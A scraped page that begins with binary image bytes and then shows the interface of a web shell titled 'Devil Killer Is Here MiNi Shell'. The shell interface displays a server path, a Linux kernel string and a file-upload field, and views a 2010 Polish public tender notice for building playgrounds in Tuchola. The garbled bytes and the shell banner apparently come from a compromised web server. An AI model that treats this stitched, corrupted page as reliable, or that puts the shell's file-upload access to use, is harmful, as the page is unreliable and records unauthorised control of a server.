JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100809/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100809/242680-N-2010.html

<p class="kh_header"><b>Tuchola: Budowa placów zabaw na terenie gminy Tuchola w 2010r.</b><br>
<b>Numer ogłoszenia: 242680 - 2010; data zamieszczenia: 09.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchola , pl. Zamkowy 1, 89-500 Tuchola, woj. kujawsko-pomorskie, tel. 0 52 56 42 500, faks 052 3342138.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miasto.tuchola.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placów zabaw na terenie gminy Tuchola w 2010r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:
1. Budowę placu zabaw w m. Białowieża w Gm. Tuchola oraz dostawę wyposażenia wraz z dowozem i montażem niżej wymienionych urządzeń w miejsce wskazane przez Zamawiającego. Wykonawca zobowiązany jest załączyć do oferty koncepcję rozmieszczenia  poszczególnych urządzeń dotyczących budowy ww. placu zabaw. Usytuowanie montowanych urządzeń powinno zawierać strefy bezpieczeństwa odpowiednie do każdego urządzenia.
Plac zabaw  powinien zostać wyposażony w następujące urządzenia:
Urządzenie	Ilość	Opis
Piaskownica 	1 szt.	Wykonana z impregnowanej palisady o boku min. 3,5m, w kształcie kwadratu, z dwoma siedziska zrobionymi z laminowanej, wodoodpornej sklejki o grubości ok. 20mm
Tablica z regulaminem	1 szt.	Całość wykonana z metalu lub drewna, zakotwiona w gruncie poprzez zabetonowanie. Minimalna wysokość 2,0 m.
Zawierająca min. następujące informacje:
-plac zabaw przeznaczony jest dla dzieci od lat 3,
-dzieci poniżej 12 lat muszą znajdować się pod opieką osób dorosłych,
-na plac zabaw nie wolno wprowadzać psów,
-na placu zabaw nie wolno śmiecić, prosimy o wyrzucanie odpadków do koszy na  śmieci,
-oraz innych informacji istotnych dla bezpieczeństwa bawiących się dzieci
Karuzela platformowa tarczowa 	1 szt.	Słup nośny stalowy łożyskowany, ramiona z rurek stalowych malowanych  proszkowo.
Platforma antypoślizgowa musi być wykonana z aluminiowej blachy ryflowanej, antypoślizgowej. Średnica  karuzeli minimum 150cm.
Bez siedzisk.
Zestaw zabawowy	1 szt.	Minimalne wyposażenie zestawu: wieża kwadratowa z daszkiem, zjeżdżalnia i wejście w formie traka lub schodków.
zjeżdżalnia - konstrukcja stalowa, malowana proszkowo, ślizg wykonany ze stali nierdzewnej; drewno - klejone warstwowo, dachy i boczki wykonane z laminowanej obustronnie wodoodpornej sklejki; posadowienie - stopy wykonane z ocynkowanej stali konstrukcyjnej, betonowane w gruncie
Huśtawka wagowa	1 szt.	słupy podstawy zakotwione w gruncie za pomocą stóp betonowych, uchwyty malowane proszkowe, podstawa oraz łożysko wykonane ze stali ocynkowanej malowanej proszkowo, belka wykonana z drewna klejonego, siedziska z tworzywa sztucznego, pochwyty, odbojniki
Urządzenie do bujania na sprężynie	1 szt.	O kształcie konika, sprężyny o średnicy ok. 200mm, wysokości 400mm podstawy 20mm, zabetonowana w gruncie za pomocą ocynkowanej kotwy
Huśtawka wahadłowa podwójna	1 szt.	słupy wykonane z drewna klejonego, impregnowanego, zawiesia łożyskowane ze stali nierdzewnej, siedziska stalowe, zabezpieczone gumą posadowione za pomocą stóp stalowych ocynkowanych związanych z gruntem przez zabetonowanie i połączone górną stalową ocynkowaną belką
Furtka	1 szt.	metalowa, samozatrzaskowa, dostosowana do istniejącego ogrodzenia
Ławka	3 szt.	Stalowy ocynkowany stelaż malowany proszkowo zakotwiony w gruncie za pomocą stóp betonowych, siedzisko i oparcie wykonane z desek o grubości ok. 35mm
Kosz na śmieci	1 szt.	Wykonany ze stali nierdzewnej, zakotwiony w podłożu za pomocą stóp fundamentowych
2. Budowę placu zabaw w m. Bladowo  w Gm. Tuchola oraz dostawę wyposażenia wraz z dowozem i montażem niżej wymienionych urządzeń w miejsce wskazane przez Zamawiającego. Wykonawca zobowiązany jest załączyć do oferty koncepcję rozmieszczenia  poszczególnych urządzeń dotyczących budowy ww. placu zabaw. Usytuowanie montowanych urządzeń powinno zawierać strefy bezpieczeństwa odpowiednie do każdego urządzenia.
Plac zabaw powinien zostać wyposażony w następujące urządzenia:
Urządzenie	Ilość	Opis
Piaskownica 	1 szt.	Wykonana z impregnowanej palisady o  bokach min. 2,5m, w kształcie kwadratu, z dwoma siedziska zrobione z laminowanej, wodoodpornej sklejki o grubości ok. 20mm
Tablica z regulaminem	1 szt.	Całość wykonana z metalu lub drewna, zakotwiona w gruncie poprzez zabetonowanie. Minimalna wysokość 2,0 m.
Zawierająca min. następujące informacje:
-plac zabaw przeznaczony jest dla dzieci od lat 3,
-dzieci poniżej 12 lat muszą znajdować się pod opieką osób dorosłych,
-na plac zabaw nie wolno wprowadzać psów,
-na placu zabaw nie wolno śmiecić, prosimy o wyrzucanie odpadków do koszy na  śmieci,
-oraz innych informacji istotnych dla bezpieczeństwa bawiących się dzieci.
Karuzela platformowa tarczowa 	1 szt.	Słup nośny stalowy łożyskowany, ramiona z rurek stalowych malowanych  proszkowo.
Platforma antypoślizgowa musi być wykonana  z aluminiowej blachy ryflowanej, antypoślizgowej. Średnica  minimum 150cm.
Bez siedzisk.
Zestaw zabawowy	1 szt.	Minimalne wyposażenie zestawu: wieża kwadratowa z daszkiem, zjeżdżalnia i wejście w formie traka lub schodków.
zjeżdżalnia - konstrukcja stalowa, malowana proszkowo, ślizg wykonany ze stali nierdzewnej; drewno - klejone warstwowo, dachy i boki wykonane z laminowanej obustronnie wodoodpornej sklejki; posadowienie - stopy wykonane z ocynkowanej stali konstrukcyjnej, betonowane w gruncie
Huśtawka wagowa	1 szt.	słupy podstawy zakotwione w gruncie za pomocą stóp betonowych, uchwyty malowane proszkowe, podstawa oraz łożysko wykonane ze stali ocynkowanej malowanej proszkowo, belka wykonana z drewna klejonego, siedziska z tworzywa sztucznego, pochwyty, odbojniki
Urządzenie do bujania na sprężynie	2 szt.	o kształcie motoru i konika, sprężyna o średnicy ok. 200mm, wysokości 400mm podstawy 20mm, zabetonowana w gruncie za pomocą ocynkowanej  kotwy
Huśtawka wahadłowa podwójna	1 szt.	słupy wykonane z drewna klejonego, impregnowanego, zawiesia łożyskowane ze stali nierdzewnej, siedziska stalowe, zabezpieczone gumą posadowione za pomocą stóp stalowych ocynkowanych związanych z gruntem przez zabetonowanie i połączone górną stalową ocynkowaną belką
3. Budowę placu zabaw w Tucholi - osiedle Rudzki Most oraz dostawę wyposażenia wraz z dowozem i montażem niżej wymienionych urządzeń w miejsce wskazane przez Zamawiającego. Wykonawca zobowiązany jest załączyć do oferty koncepcję rozmieszczenia  poszczególnych urządzeń dotyczących budowy ww. placu zabaw zgodnie z mapka sytuacyjną tak jak w Białowieży. Usytuowanie montowanych urządzeń powinno zawierać strefy bezpieczeństwa odpowiednie do każdego urządzenia.
Plac zabaw powinien zostać wyposażony w następujące urządzenia:
Urządzenie	Ilość	Opis
Piaskownica 	1 szt.	Wykonana z impregnowanej palisady o boku min. 3,5m, w kształcie kwadratu, z dwoma siedziska zrobionymi z laminowanej, wodoodpornej sklejki o grubości ok. 20mm
Tablica z regulaminem	1 szt.	Całość wykonana z metalu lub drewna, zakotwiona w gruncie poprzez zabetonowanie. Minimalna wysokość 2,0 m.
Zawierająca min. następujące informacje:
-plac zabaw przeznaczony jest dla dzieci od lat 3,
-dzieci poniżej 12 lat muszą znajdować się pod opieką osób dorosłych,
-na plac zabaw nie wolno wprowadzać psów,
-na placu zabaw nie wolno śmiecić, prosimy o wyrzucanie odpadków do koszy na  śmieci,
-oraz innych informacji istotnych dla bezpieczeństwa bawiących się dzieci
Karuzela platformowa tarczowa 	1 szt.	Słup nośny stalowy łożyskowany, ramiona z rurek stalowych malowanych  proszkowo.
Platforma antypoślizgowa musi być wykonana z aluminiowej blachy ryflowanej, antypoślizgowej. Średnica  karuzeli minimum 150cm.
Bez siedzisk.
Zestaw zabawowy	1 szt.	Minimalne wyposażenie zestawu: wieża kwadratowa z daszkiem, zjeżdżalnia i wejście w formie traka lub schodków.
zjeżdżalnia - konstrukcja stalowa, malowana proszkowo, ślizg wykonany ze stali nierdzewnej; drewno - klejone warstwowo, dachy i boczki wykonane z laminowanej obustronnie wodoodpornej sklejki; posadowienie - stopy wykonane z ocynkowanej stali konstrukcyjnej, betonowane w gruncie
Huśtawka wagowa	1 szt.	słupy podstawy zakotwione w gruncie za pomocą stóp betonowych, uchwyty malowane proszkowe, podstawa oraz łożysko wykonane ze stali ocynkowanej malowanej proszkowo, belka wykonana z drewna klejonego, siedziska z tworzywa sztucznego, pochwyty, odbojniki
Urządzenie do bujania na sprężynie	1 szt.	O kształcie konika, sprężyny o średnicy ok. 200mm, wysokości 400mm podstawy 20mm, zabetonowana w gruncie za pomocą ocynkowanej kotwy
Huśtawka wahadłowa podwójna	1 szt.	słupy wykonane z drewna klejonego, impregnowanego, zawiesia łożyskowane ze stali nierdzewnej, siedziska stalowe, zabezpieczone gumą posadowione za pomocą stóp stalowych ocynkowanych związanych z gruntem przez zabetonowanie i połączone górną stalową ocynkowaną belką
Ławka	3 szt.	Stalowy ocynkowany stelaż malowany proszkowo zakotwiony w gruncie za pomocą stóp betonowych, siedzisko i oparcie wykonane z desek o grubości ok. 35mm
Kosz na śmieci	1 szt.	Wykonany ze stali nierdzewnej, zakotwiony w podłożu za pomocą stóp fundamentowych
4. Dostawę urządzeń zabawowych oraz ich montaż na 4 istniejących placach zabaw na terenie gminy Tuchola.
Place zabaw powinny zostać doposażone w następujące urządzenia:
Urządzenie	Ilość	Opis
Zestaw zabawowy	1 szt.	Minimalne wyposażenie zestawu: wieża kwadratowa z daszkiem, zjeżdżalnia i wejście w formie traka lub schodków.
zjeżdżalnia - konstrukcja stalowa, malowana proszkowo, ślizg wykonany ze stali nierdzewnej; drewno - klejone warstwowo, dachy i boczki wykonane z laminowanej obustronnie wodoodpornej sklejki; posadowienie - stopy wykonane z ocynkowanej stali konstrukcyjnej, betonowane w gruncie
Huśtawka wahadłowa podwójna	1 szt.	Słupy wykonane z drewna klejonego, impregnowanego, zawiesia łożyskowane ze stali nierdzewnej, siedziska kubełkowe dla małych dzieci, zabezpieczone gumą posadowione za pomocą stóp stalowych ocynkowanych związanych z gruntem przez zabetonowanie i połączone górną stalową ocynkowaną belką
karuzela platformowa tarczowa	1 szt.	Słup nośny stalowy łożyskowany, ramiona z rurek stalowych malowanych  proszkowo.
Platforma antypoślizgowa musi być wykonana z płyty szalunkowej, wodoodpornej grubości minimum 25 mm lub aluminiowej blachy ryflowanej, antypoślizgowej. Średnica  minimum 150cm.
Bez siedzisk.
Urządzenie do bujania na sprężynie	1 szt.	O kształcie kwiatka lub konika, sprężyna o średnicy ok. 200mm, wysokości 400mm podstawy 20mm, zabetonowana w gruncie za pomocą ocynkowanej  kotwy
Opis techniczny urządzeń:
1.	Wszystkie urządzenia i zestawy zabawowe muszą posiadać certyfikaty potwierdzające spełnianie norm bezpieczeństwa PN-EN 1176.
2.	Elementy konstrukcyjne wykonane z impregnowanego iglastego drewna klejonego warstwowo malowanego farbą akrylową, tworzącą elastyczną powłokę.  
3.	Urządzenia  osadzane  przy pomocy ocynkowanych podstaw stalowych zabetonowanych w gruncie.
4.	Elementy metalowe - zjeżdżalnie, uchwyty, poręcze, balkoniki i inne wykonane ze stali nierdzewnej malowanej proszkowo o gładkich  (bezpiecznych) krawędziach. 
5.	Elementy konstrukcyjne  zakończone od góry kapturkami z tworzywa.
6.	Gwarancja na urządzenia min. 2 lata.
7.	Urządzenia i zestawy zabawowe muszą spełniać minimalne wymagania Zamawiającego, a w skład wymaganego przez zamawiającego zestawu muszą wchodzić wszystkie elementy składowe zgodnie z przedstawionym opisem.
8.	Wykonawca w cenie oferty powinien uwzględnić również montaż oraz dostawę urządzeń na miejsce wskazane przez Zamawiającego.
Wykonawca jest zobowiązany załączyć do oferty zdjęcia, foldery lub katalogi przedstawiające wybrane urządzenia. Opis ww. sprzętu do zabaw powinien zawierać wymiary danego urządzenia. Wykonawca załączy również do oferty koncepcję rozmieszczenia  poszczególnych urządzeń dotyczących budowy placów zabaw z uwzględnieniem tzw. stref bezpieczeństwa. 
Wykonawca załączy do oferty kosztorys ofertowy zawierający zestawienie cenowe z wyszczególnieniem poszczególnych urządzeń stanowiący załącznik nr 1 do oferty.

Certyfikaty na poszczególne urządzenia zabawowe potwierdzające spełnianie wymaganych parametrów oraz potwierdzających, że urządzenia są bezpieczne dla dzieci Zamawiający zażąda od wykonawcy wybranego w niniejszym postępowaniu przed podpisaniem umowy.

Do wykonania zamówienia Wykonawca zobowiązany jest użyć materiałów gwarantujących odpowiednią jakość, o parametrach technicznych i jakościowych odpowiadających właściwościom materiałów przyjętych w niniejszej siwz (tj. równoważnych)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje, zgodnie z art. 67 ust. 1 pkt. 6) i 7) Prawa zamówień publicznych możliwość dokonania zamówień uzupełniających.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.23-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę  warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zamawiający żąda załączenia do oferty następujących oświadczeń i dokumentów:
1) Wypełnionego formularza oferty wraz z kosztorysami ofertowymi - załącznik nr 1;
2) Oświadczenia, że wykonawca spełnia warunki określone w SIWZ wynikające i określone w art. 22 ust. 1 ustawy - załącznik nr 2;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę  warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zamawiający żąda załączenia do oferty następujących oświadczeń i dokumentów:
Wykazu robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Wymagane jest wykazanie min. 2  robót  dotyczących  budowy placu zabaw - załącznik nr 4,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę  warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zamawiający żąda załączenia do oferty następujących oświadczeń i dokumentów:
Wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami - załącznik nr 5. 
Do ww. wykazu należy załączyć kopię dokumentu potwierdzającego posiadanie uprawnień budowlanych 1 osoby do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  pełniącej na budowie obowiązki kierownika budowy.
Wykonawca zobowiązany jest załączyć kopie jej aktualnego zaświadczenia o wpisie do właściwej izby samorządu zawodowego potwierdzającego ważne ubezpieczenie OC lub oświadczenie, iż ww. osoba posiada wymagane aktualne uprawnienia .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania spełniania przez Wykonawcę  warunków, o których mowa w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych zamawiający żąda załączenia do oferty następujących oświadczeń i dokumentów:
Opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
